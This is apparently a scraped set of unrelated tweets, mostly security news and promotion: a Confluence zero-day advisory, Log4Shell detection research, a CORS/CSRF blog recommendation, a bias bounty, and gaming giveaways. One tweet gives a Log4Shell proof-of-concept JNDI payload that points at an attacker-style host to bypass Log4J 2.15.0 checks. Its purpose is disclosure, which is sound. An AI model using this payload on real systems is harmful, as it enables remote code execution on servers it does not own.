🔑How does a FIDO security key limit the hacks we're seeing in the news now?🔑
Beyond fun to work with @Yubico & partner with @Twitter to answer that question + demo how social engineering is used to steal passwords & siphon out MFA codes to gain admin access with @EvanTobac.
Huge shoutout to @ropnop on this article blog.ropnop.com/talk/2020/dont… of SOP, CORS and CSRF. I don't know how many times I have referred to this blog to make sure I understand these concepts properly. Looking forward to more of these.🙌
🔥 Summer of RTX keeps on giving 🔥
We have 15 GeForce RTX 3080 Ti GPUs up for grabs👀
Want one?! Let us know the first GPU you gamed on + comment #RTXON👇
Atlassian is warning about a zero-day in Confluence (CVE-2022-26134). This is a pre-auth, remote code execution bug. No patch yet. Atlassian credits @Volexity which reported it after responding to different victims who got shells/backdoors via this flaw. confluence.atlassian.com/doc/confluence…
FIX: Here is a PoC on how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0 to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n
We've updated the blog post on Log4Shell: Reconnaissance and post exploitation network detection
- New vulnerable .class / .jar hunter script - Python 3 - github.com/fox-it/log4j-f…
- New JNDI ExploitKit analysis
- .. and more
research.nccgroup.com/2021/12/12/log…
Calling all bounty hunters - it’s officially go time! We’ve just released the full details of our algorithmic bias bounty challenge which is open through August 6. For more details on the challenge, head over to our blog 👇 blog.twitter.com/engineering/en…
GN wireframe mouse mats are back in stock & shipping now! We're mixing in some signed ones at random with the existing back-orders & some of the new orders. store.gamersnexus.net/products/gn-wi…
I’m teaching a secure coding masterclass at GOTOpia Chicago on April 19th, this Monday! If you care to join please use discount code jim10 for 10% off.
gotochgo.com/2021/mastercla…
I hope to see you there! Please RT! :)